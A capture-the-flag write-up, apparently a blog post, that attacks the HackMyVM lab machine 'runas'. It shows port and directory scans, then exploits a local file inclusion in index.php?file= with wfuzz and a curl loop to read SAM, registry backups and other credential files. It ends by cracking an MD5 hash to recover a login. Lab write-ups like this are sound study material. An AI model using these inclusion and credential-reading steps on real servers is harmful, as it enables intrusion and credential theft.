{"id":839,"date":"2025-06-08T10:45:21","date_gmt":"2025-06-08T02:45:21","guid":{"rendered":"http:\/\/162.14.82.114\/?p=839"},"modified":"2025-06-08T10:45:21","modified_gmt":"2025-06-08T02:45:21","slug":"hmv-_-runas","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/839\/06\/08\/2025\/","title":{"rendered":"hmv[-_-]runas"},"content":{"rendered":"<h1>runas<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041320.png\" alt=\"image-20250608080344697\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041322.png\" alt=\"image-20250608080309000\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTreadStone was here \ud83d\ude80\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.105:139\nOpen 192.168.10.105:445\nOpen 192.168.10.105:80\nOpen 192.168.10.105:135\nOpen 192.168.10.105:3389\nOpen 192.168.10.105:5357\nOpen 192.168.10.105:49153\nOpen 192.168.10.105:49154\nOpen 192.168.10.105:49156\nOpen 192.168.10.105:49157\nOpen 192.168.10.105:49152\nOpen 192.168.10.105:49155\n\nPORT      STATE SERVICE        REASON          VERSION\n80\/tcp    open  http           syn-ack ttl 128 Apache httpd 2.4.57 ((Win64) PHP\/7.2.0)\n|_http-server-header: Apache\/2.4.57 (Win64) PHP\/7.2.0\n| http-methods: \n|   Supported Methods: GET POST OPTIONS HEAD TRACE\n|_  Potentially risky methods: TRACE\n|_http-title: Index of \/\n135\/tcp   open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn    syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds   syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n3389\/tcp  open  ms-wbt-server? syn-ack ttl 128\n|_ssl-date: 2025-06-08T00:07:17+00:00; +5s from scanner time.\n| ssl-cert: Subject: commonName=runas-PC\n| Issuer: commonName=runas-PC\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha1WithRSAEncryption\n| Not valid before: 2025-06-07T00:01:50\n| Not valid after:  2025-12-07T00:01:50\n| MD5:   79d2:2c91:6900:cf44:07c4:be17:ad76:b183\n| SHA-1: 2a37:06f2:d351:9e58:d031:f6d4:1d46:7419:11f9:7470\n| -----BEGIN CERTIFICATE-----\n| MIIC1DCCAbygAwIBAgIQbmwyyXTSJoZIeYTVho1hWDANBgkqhkiG9w0BAQUFADAT\n| MREwDwYDVQQDEwhydW5hcy1QQzAeFw0yNTA2MDcwMDAxNTBaFw0yNTEyMDcwMDAx\n| NTBaMBMxETAPBgNVBAMTCHJ1bmFzLVBDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEAz\/9\/onOUclAE92QDCErEIK35pXJ\/RyJqibUfdZNbttNACY0USk51\n| OKqFI0cKOKQsXoc6Grxl7UfVwC9v6ZCoYTWl3YgMUq0auV8WoWluH1YaZ\/Oro8LD\n| H9RCqE0\/Dia8GOcmjkMlpIOA5sewWj4t09Mcs2gf1ALEeZfKgMwgyAwp7zjkOKpr\n| aR9mPudZWvcSvB9Cv0i69\/hfuixH4InCSsgM86jBXtqlpDD01XkT5u2xgXbd4GOL\n| 4PyHdomFahgeyvytPZ8b9RamvNh8xBtHBqKF1Tdur993m6Y\/T1k1vficRRuvs4tm\n| 
kKn6YaabmEpjbFd9AiRAqJrnQqsYIZ7ZXwIDAQABoyQwIjATBgNVHSUEDDAKBggr\n| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAHjb9pGELhjm\n| mOKB1ZhxwqGSc9+01mmb8rdS1Va\/fkusoogYG4mkurnukDNmUwwKCPsP9XWdQjgA\n| gz9K9+\/N4hMkhKptzBKAAj+JGcz7BJnSlkLKHnRsDaNAlTIN8r7fIFqLY2hh\/VrI\n| wFITd2yNOlXryUuBcXyzkdpn0q5QtwWsrcvLri\/i7h3Gg4LwdxfKE\/YFfG1VPLxH\n| dVurHBpA2OYAOoEb3jZRhA\/ryLSTV2Q3N437MBC1HTXH40JnVuS9PJuNdR7j4MM9\n| SMcpaGij6vIhUU2RAnsZhL25knOEsgPMyzrePAYWYu4ZZP18XlkiyShXibwx9tN8\n| ZiLbLHEvkpg=\n|_-----END CERTIFICATE-----\n| rdp-ntlm-info: \n|   Target_Name: RUNAS-PC\n|   NetBIOS_Domain_Name: RUNAS-PC\n|   NetBIOS_Computer_Name: RUNAS-PC\n|   DNS_Domain_Name: runas-PC\n|   DNS_Computer_Name: runas-PC\n|   Product_Version: 6.1.7601\n|_  System_Time: 2025-06-08T00:07:12+00:00\n5357\/tcp  open  http           syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Service Unavailable\n49152\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49153\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49154\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49155\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49156\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\n49157\/tcp open  msrpc          syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:15:AC:5F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 58509\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 48287\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 7707\/udp): CLEAN (Timeout)\n|   Check 4 (port 10964\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS 
MAC: 08:00:27:15:ac:5f (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   RUNAS-PC&lt;00&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   RUNAS-PC&lt;20&gt;         Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:15:ac:5f:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: runas-PC\n|   NetBIOS computer name: RUNAS-PC\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2025-06-08T03:07:12+03:00\n| smb2-time: \n|   date: 2025-06-08T00:07:12\n|_  start_date: 2025-06-08T00:01:48\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_clock-skew: mean: -35m55s, deviation: 1h20m29s, median: 4s\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/   \n\n  _|. 
_ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/runas\/reports\/http_192.168.10.105\/__25-06-07_20-18-05.txt\n\nTarget: http:\/\/192.168.10.105\/\n\n[20:18:05] Starting: \n[20:18:05] 403 -  199B  - \/%C0%AE%C0%AE%C0%AF\n[20:18:05] 403 -  199B  - \/%3f\/\n[20:18:05] 403 -  199B  - \/%ff\n[20:18:08] 403 -  199B  - \/.ht_wsr.txt\n[20:18:08] 403 -  199B  - \/.htaccess.bak1\n[20:18:08] 403 -  199B  - \/.htaccess.save\n[20:18:09] 403 -  199B  - \/.htaccess.sample\n[20:18:09] 403 -  199B  - \/.htaccess.orig\n[20:18:09] 403 -  199B  - \/.htaccess_orig\n[20:18:09] 403 -  199B  - \/.htaccess_extra\n[20:18:09] 403 -  199B  - \/.htaccess_sc\n[20:18:09] 403 -  199B  - \/.htaccessOLD2\n[20:18:09] 403 -  199B  - \/.htaccessBAK\n[20:18:09] 403 -  199B  - \/.htaccessOLD\n[20:18:09] 403 -  199B  - \/.htm\n[20:18:09] 403 -  199B  - \/.html\n[20:18:09] 403 -  199B  - \/.htpasswd_test\n[20:18:09] 403 -  199B  - \/.htpasswds\n[20:18:09] 403 -  199B  - \/.httr-oauth\n[20:18:27] 403 -  199B  - \/cgi-bin\/\n[20:18:27] 500 -  530B  - \/cgi-bin\/printenv.pl\n[20:18:39] 200 -  414B  - \/index.php\n[20:18:39] 200 -  414B  - \/index.pHp\n[20:18:39] 200 -  414B  - \/index.php.\n[20:18:39] 403 -  199B  - \/index.php::$DATA\n[20:18:39] 200 -  414B  - \/index.php\/login\/\n[20:19:01] 403 -  199B  - \/Trace.axd::$DATA\n[20:19:04] 403 -  199B  - \/web.config::$DATA\n\nTask Completed<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Initial Recon<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ curl -s http:\/\/$IP\/ | html2text\n****** Index of \/ ******\n    * index.php\n    * styles.css<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041323.png\" alt=\"image-20250608081957106\" style=\"zoom:50%;\" \/><\/p>\n<h3>Fuzzing the Parameter<\/h3>\n<p>Check whether a file can be included:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ curl -s &quot;http:\/\/$IP\/index.php?file=styles.css&quot; | html2text\n****** There is no going back! ******\n***** ?file= *****\nbody {\n\n    font-family: Arial, sans-serif;\n\n    background-color: #f4f4f4;\n\n    margin: 0;\n\n    padding: 0;\n\n}\n\n.container {\n\n    max-width: 600px;\n\n    margin: 50px auto;\n\n    padding: 20px;\n\n    background-color: white;\n\n    border-radius: 8px;\n\n    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);\n\n    text-align: center;\n\n}\n\nh1 {\n\n    color: #333;\n\n    margin-bottom: 20px;\n\n}\n\nform {\n\n    margin-bottom: 20px;\n\n}\n\ninput[type=&quot;text&quot;] {\n\n    width: 80%;\n\n    padding: 10px;\n\n    border: 1px solid #ccc;\n\n    border-radius: 4px;\n\n    margin-right: 10px;\n\n}\n\nbutton {\n\n    padding: 10px 15px;\n\n    background-color: #28a745;\n\n    color: white;\n\n    border: none;\n\n    border-radius: 4px;\n\n    cursor: pointer;\n\n}\n\nbutton:hover {\n\n    background-color: #218838;\n\n}\n\n.output {\n\n    margin-top: 20px;\n\n    text-align: 
left;\n\n}<\/code><\/pre>\n<p>So inclusion works. I tried the usual directory traversal payloads without success, so let&#039;s fuzz it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ wfuzz -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u &quot;http:\/\/$IP\/index.php?file=FUZZ&quot; --hw 35\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.10.105\/index.php?file=FUZZ\nTotal requests: 236\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000015:   200        1928 L   12417 W    85387 Ch    &quot;C:\/php\/php.ini&quot;                                                                                                            \n000000044:   200        38 L     189 W      1375 Ch     &quot;C:\/WINDOWS\/System32\/drivers\/etc\/hosts&quot;                                                                                     \n000000045:   200        45 L     96 W       1042 Ch     &quot;C:\/Windows\/win.ini&quot;                                                                                                        \n000000041:   200        17 L     33 W       425 Ch      &quot;C:\/Windows\/repair\/system&quot;                                                                                                  \n000000040:   200        17 L     33 W       425 Ch      &quot;C:\/WINDOWS\/Repair\/SAM&quot;                                                                                                     
\n000000078:   200        1928 L   12417 W    85387 Ch    &quot;c:\/PHP\/php.ini&quot;                                                                                                            \n000000077:   200        1928 L   12417 W    85387 Ch    &quot;c:\/php\/php.ini&quot;                                                                                                            \n000000067:   200        820 L    3729 W     79253 Ch    &quot;C:\/Windows\/System32\/inetsrv\/config\/applicationHost.config&quot;                                                                 \n000000064:   200        19 L     50 W       632 Ch      &quot;C:\/Windows\/system32\/config\/regback\/software&quot;                                                                               \n000000066:   200        598 L    2797 W     58608 Ch    &quot;C:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml&quot;                                                               \n000000062:   200        19 L     50 W       632 Ch      &quot;C:\/Windows\/system32\/config\/regback\/security&quot;                                                                               \n000000063:   200        19 L     50 W       630 Ch      &quot;C:\/Windows\/system32\/config\/regback\/system&quot;                                                                                 \n000000061:   200        19 L     50 W       627 Ch      &quot;C:\/Windows\/system32\/config\/regback\/sam&quot;                                                                                    \n000000060:   200        19 L     50 W       631 Ch      &quot;C:\/Windows\/system32\/config\/regback\/default&quot;                                                                                \n000000001:   200        17 L     33 W       425 Ch      &quot;C:\/Users\/Administrator\/NTUser.dat&quot;                                                                                         \n000000223:   200        302 L    
1569 W     19622 Ch    &quot;c:\/WINDOWS\/system32\/drivers\/etc\/services&quot;                                                                                  \n000000220:   200        96 L     700 W      4760 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam&quot;                                                                               \n000000222:   200        44 L     232 W      1973 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/protocol&quot;                                                                                  \n000000219:   200        38 L     189 W      1375 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/hosts&quot;                                                                                     \n000000230:   200        17 L     33 W       425 Ch      &quot;c:\/WINDOWS\/setuperr.log&quot;                                                                                                   \n000000228:   200        313 L    2051 W     25712 Ch    &quot;c:\/WINDOWS\/setupact.log&quot;                                                                                                   \n000000221:   200        33 L     105 W      946 Ch      &quot;c:\/WINDOWS\/system32\/drivers\/etc\/networks&quot;                                                                                  \n000000233:   200        1170 L   13297 W    108051 Ch   &quot;c:\/WINDOWS\/WindowsUpdate.log&quot;                                                                                              \n\nTotal time: 0.456759\nProcessed Requests: 236\nFiltered Requests: 213\nRequests\/sec.: 516.6836<\/code><\/pre>\n<h3>Information Gathering<\/h3>\n<p>I couldn&#039;t think of any way to exploit this... so the only option is to go through the paths one by one...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ wfuzz -w \/usr\/share\/wordlists\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u &quot;http:\/\/$IP\/index.php?file=FUZZ&quot; --hw 35 2&gt;\/dev\/null &gt; wfuzz.log<\/code><\/pre>\n<p>Something very strange happens here, take a look:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041325.png\" alt=\"image-20250608085949618\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041326.png\" alt=\"image-20250608090023542\" style=\"zoom:50%;\" \/><\/p>\n<p>I used <code>bat<\/code> only because it looks nicer; <code>cat -A<\/code> works just as well. The two views differ this much... which shows that part of the content written into the file is invisible rather than absent... Unbelievable, I thought I was seeing ghosts; I spent ages on regexes only to find that the more I filtered, the more I got...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log | grep -v &quot;35&quot; | grep -oP &#039;&quot;\\K[^&quot;]+&#039; &gt; wfuzz.log1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat -A wfuzz.log1\nC:\/Users\/Administrator\/NTUser.dat$\n                                                                                         ^[[0m$\nC:\/php\/php.ini$\n                                                                                                            ^[[0m$\nC:\/Windows\/win.ini$\n                                                                                                        ^[[0m$\nC:\/WINDOWS\/Repair\/SAM$\n                                                                                                     ^[[0m$\nC:\/Windows\/repair\/system$\n                                                                                                  ^[[0m$\nC:\/WINDOWS\/System32\/drivers\/etc\/hosts$\n                                                                                     ^[[0m$\nc:\/php\/php.ini$\n                                                                                                            ^[[0m$\nC:\/Windows\/System32\/inetsrv\/config\/applicationHost.config$\n                                                                 ^[[0m$\nc:\/PHP\/php.ini$\n                                                                                                            
^[[0m$\nC:\/Windows\/system32\/config\/regback\/software$\n                                                                               ^[[0m$\nC:\/Windows\/system32\/config\/regback\/security$\n                                                                               ^[[0m$\nC:\/Windows\/system32\/config\/regback\/sam$\n                                                                                    ^[[0m$\nC:\/Windows\/system32\/config\/regback\/default$\n                                                                                ^[[0m$\nC:\/Windows\/system32\/config\/regback\/system$\n                                                                                 ^[[0m$\nC:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml$\n                                                               ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam$\n                                                                               ^[[0m$\nc:\/WINDOWS\/setuperr.log$\n                                                                                                   ^[[0m$\nc:\/WINDOWS\/WindowsUpdate.log$\n                                                                                              ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/services$\n                                                                                  ^[[0m$\nc:\/WINDOWS\/setupact.log$\n                                                                                                   ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/hosts$\n                                                                                     ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/protocol$\n                                                                                  ^[[0m$\nc:\/WINDOWS\/system32\/drivers\/etc\/networks$\n                                                                                  
^[[0m$\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log1 | sort | tail -n 23 &gt; wfuzz.log2\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat wfuzz.log2                                 \nc:\/php\/php.ini\nc:\/PHP\/php.ini\nC:\/php\/php.ini\nC:\/Users\/Administrator\/NTUser.dat\nC:\/WINDOWS\/Repair\/SAM\nC:\/Windows\/repair\/system\nc:\/WINDOWS\/setupact.log\nc:\/WINDOWS\/setuperr.log\nC:\/Windows\/system32\/config\/regback\/default\nC:\/Windows\/system32\/config\/regback\/sam\nC:\/Windows\/system32\/config\/regback\/security\nC:\/Windows\/system32\/config\/regback\/software\nC:\/Windows\/system32\/config\/regback\/system\nc:\/WINDOWS\/system32\/drivers\/etc\/hosts\nC:\/WINDOWS\/System32\/drivers\/etc\/hosts\nc:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam\nc:\/WINDOWS\/system32\/drivers\/etc\/networks\nc:\/WINDOWS\/system32\/drivers\/etc\/protocol\nc:\/WINDOWS\/system32\/drivers\/etc\/services\nC:\/Windows\/System32\/inetsrv\/config\/applicationHost.config\nC:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml\nc:\/WINDOWS\/WindowsUpdate.log\nC:\/Windows\/win.ini                                                                                               <\/code><\/pre>\n<p>Let&#039;s see what they contain:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ while IFS= read -r filename; do echo &quot;[+] \u5df2\u8bbf\u95ee: \\&quot;$filename\\&quot;&quot;; echo &quot;[+] \u5f53\u524d\u76ee\u5f55\u4e3a:\\&quot;$filename\\&quot;&quot; &gt;&gt; results.log; curl -s &quot;http:\/\/192.168.10.105\/index.php?file=${filename}&quot; | html2text &gt;&gt; results.log; echo &quot;&quot; &gt;&gt; results.log; done &lt; wfuzz.log2\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/php\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/PHP\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/php\/php.ini&quot;\n[+] \u5df2\u8bbf\u95ee: 
&quot;C:\/Users\/Administrator\/NTUser.dat&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/WINDOWS\/Repair\/SAM&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/repair\/system&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/setupact.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/setuperr.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/default&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/sam&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/security&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/software&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/system32\/config\/regback\/system&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/hosts&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/WINDOWS\/System32\/drivers\/etc\/hosts&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/networks&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/protocol&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/system32\/drivers\/etc\/services&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/System32\/inetsrv\/config\/applicationHost.config&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/System32\/inetsrv\/config\/schema\/ASPNET_schema.xml&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;c:\/WINDOWS\/WindowsUpdate.log&quot;\n[+] \u5df2\u8bbf\u95ee: &quot;C:\/Windows\/win.ini&quot;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ cat results.log | grep runas  \nprocess as runas-PC\\Administrator in session 2\nprocess as runas-PC\\Administrator in session 2\nprocess as runas-PC\\Administrator in session 1\nprocess as runas-PC\\Administrator in session 1\n; 
MD5-runas-b3a805b2594befb6c846d718d1224557<\/code><\/pre>\n<p>Found an <code>md5<\/code> hash; try to crack it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/runas]\n\u2514\u2500$ hash-identifier \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: b3a805b2594befb6c846d718d1224557\n\nPossible Hashs:\n[+] MD5\n[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))\n\nLeast Possible Hashs:\n[+] RAdmin v2.x\n[+] NTLM\n[+] MD4\n[+] MD2\n[+] MD5(HMAC)\n[+] MD4(HMAC)\n[+] MD2(HMAC)\n[+] MD5(HMAC(WordPress))\n[+] Haval-128\n[+] Haval-128(HMAC)\n[+] RipeMD-128\n[+] RipeMD-128(HMAC)\n[+] SNEFRU-128\n[+] SNEFRU-128(HMAC)\n[+] Tiger-128\n[+] Tiger-128(HMAC)\n[+] md5($pass.$salt)\n[+] md5($salt.$pass)\n[+] md5($salt.$pass.$salt)\n[+] md5($salt.$pass.$username)\n[+] md5($salt.md5($pass))\n[+] md5($salt.md5($pass))\n[+] 
md5($salt.md5($pass.$salt))\n[+] md5($salt.md5($pass.$salt))\n[+] md5($salt.md5($salt.$pass))\n[+] md5($salt.md5(md5($pass).$salt))\n[+] md5($username.0.$pass)\n[+] md5($username.LF.$pass)\n[+] md5($username.md5($pass).$salt)\n[+] md5(md5($pass))\n[+] md5(md5($pass).$salt)\n[+] md5(md5($pass).md5($salt))\n[+] md5(md5($salt).$pass)\n[+] md5(md5($salt).md5($pass))\n[+] md5(md5($username.$pass).$salt)\n[+] md5(md5(md5($pass)))\n[+] md5(md5(md5(md5($pass))))\n[+] md5(md5(md5(md5(md5($pass)))))\n[+] md5(sha1($pass))\n[+] md5(sha1(md5($pass)))\n[+] md5(sha1(md5(sha1($pass))))\n[+] md5(strtoupper(md5($pass)))\n--------------------------------------------------<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041327.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506081041327.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250608094334372\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u8fdc\u7a0b\u767b\u5f55<\/h3>\n<p>\u5f97\u5230\u51ed\u8bc1\uff1a<code>runas:yakuzza<\/code>\u3002\u5c1d\u8bd5\u8fdb\u884cssh\u767b\u5f55\uff0c\u4f46\u662f\u53d1\u73b0\u6ca1\u5f00\u542f22\u7aef\u53e3\uff0c\u6240\u5e78\u76ee\u6807\u4e3b\u673a\u5f00\u542f\u4e86<code>3389<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>win+R<\/code>\u518d<code>mstsc<\/code>\u8fdb\u884c\u8fdc\u7a0b\u684c\u9762\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
